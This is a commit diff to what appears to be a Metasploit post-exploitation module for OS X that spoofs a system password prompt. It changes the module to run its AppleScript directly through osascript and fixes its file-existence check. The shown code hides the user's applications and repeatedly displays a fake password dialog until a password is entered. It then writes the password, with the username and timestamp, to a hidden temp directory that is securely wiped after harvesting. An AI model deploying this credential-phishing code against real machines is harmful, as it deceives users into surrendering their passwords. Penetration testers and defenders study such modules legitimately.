Removed script launcher wrapper and fixed the file_exists so that the module now detects input

2013-11-27 21:38:20 +01:00 · 2013-11-27 21:38:20 +01:00 · 95a98529c4
parent b5fc0493a5
commit 95a98529c4
1 changed files with 34 additions and 52 deletions
--- a/modules/post/osx/gather/password_prompt_spoof.rb
+++ b/modules/post/osx/gather/password_prompt_spoof.rb
@ -19,7 +19,8 @@ class Metasploit3 < Msf::Post
        'License'       => MSF_LICENSE,
        'Author'        => [
          'Joff Thyer <jsthyer[at]gmail.com>', # original post module
-          'joev' # bug fixes
+          'joev', # bug fixes
+          'Peter Toth <globetother[at]gmail.com>' # bug fixes
        ],
        'Platform'      => [ 'osx' ],
        'References'    => [
@ -79,29 +80,23 @@ class Metasploit3 < Msf::Post
    print_status("Running module against #{host}")

    dir       = "/tmp/." + Rex::Text.rand_text_alpha((rand(8)+6))
-    runme     = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
    creds_osa = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
-    creds     = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
    pass_file = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))

    username = cmd_exec("/usr/bin/whoami").strip
    cmd_exec("umask 0077")
    cmd_exec("/bin/mkdir #{dir}")

-    # write the script that will launch things
-    write_file(runme, run_script)
-    cmd_exec("/bin/chmod 700 #{runme}")
-
-    # write the credentials script, compile and run
+    # write the credentials script and run
    write_file(creds_osa,creds_script(pass_file))
-    cmd_exec("/usr/bin/osacompile -o #{creds} #{creds_osa}")
-    cmd_exec("#{runme} #{creds}")
+    cmd_exec("cat #{creds_osa} | osascript")
+
    print_status("Waiting for user '#{username}' to enter credentials...")

    timeout = ::Time.now.to_f + datastore['TIMEOUT'].to_i
    pass_found = false
    while (::Time.now.to_f < timeout)
-      if ::File.exist?(pass_file)
+      if file_exist?(pass_file)
        print_status("Password entered! What a nice compliant user...")
        pass_found = true
        break
@ -122,51 +117,38 @@ class Metasploit3 < Msf::Post
    cmd_exec("/usr/bin/srm -rf #{dir}")
  end

-  # "wraps" the #creds_script applescript and allows it to make UI calls
-  def run_script
-    %Q{
-      #!/bin/bash
-      osascript <<EOF
-      set scriptfile to "$1"
-      tell application "AppleScript Runner"
-        do script scriptfile
-      end tell
-      EOF
-    }
-  end
-
  # applescript that displays the actual password prompt dialog
  def creds_script(pass_file)
    textcreds = datastore['TEXTCREDS']
    ascript = %Q{
-      set filename to "#{pass_file}"
-      set myprompt to "#{textcreds}"
-      set ans to "Cancel"
-      repeat
-        try
-          tell application "Finder"
-            activate
-            tell application "System Events" to keystroke "h" using {command down, option down}
-            set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "#{datastore['ICONFILE']}" in bundle "#{datastore['BUNDLEPATH']}"
-            set ans to button returned of d_returns
-            set mypass to text returned of d_returns
-            if ans is equal to "OK" and mypass is not equal to "" then exit repeat
-          end tell
-        end try
-      end repeat
-      try
-        set now to do shell script "date '+%Y%m%d_%H%M%S'"
-          set user to do shell script "whoami"
-        set myfile to open for access filename with write permission
-        set outstr to now & ":" & user & ":" & mypass & "
-      "
-        write outstr to myfile starting at eof
-        close access myfile
-      on error
-        try
-          close access myfile
-        end try
-      end try
+set filename to "#{pass_file}"
+set myprompt to "#{textcreds}"
+set ans to "Cancel"
+repeat
+  try
+    tell application "Finder"
+      activate
+      tell application "System Events" to keystroke "h" using {command down, option down}
+      set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "#{datastore['ICONFILE']}" in bundle "#{datastore['BUNDLEPATH']}"
+      set ans to button returned of d_returns
+      set mypass to text returned of d_returns
+      if ans is equal to "OK" and mypass is not equal to "" then exit repeat
+    end tell
+  end try
+end repeat
+try
+  set now to do shell script "date '+%Y%m%d_%H%M%S'"
+    set user to do shell script "whoami"
+  set myfile to open for access filename with write permission
+  set outstr to now & ":" & user & ":" & mypass & "
+"
+  write outstr to myfile starting at eof
+  close access myfile
+on error
+  try
+    close access myfile
+  end try
+end try
    }
  end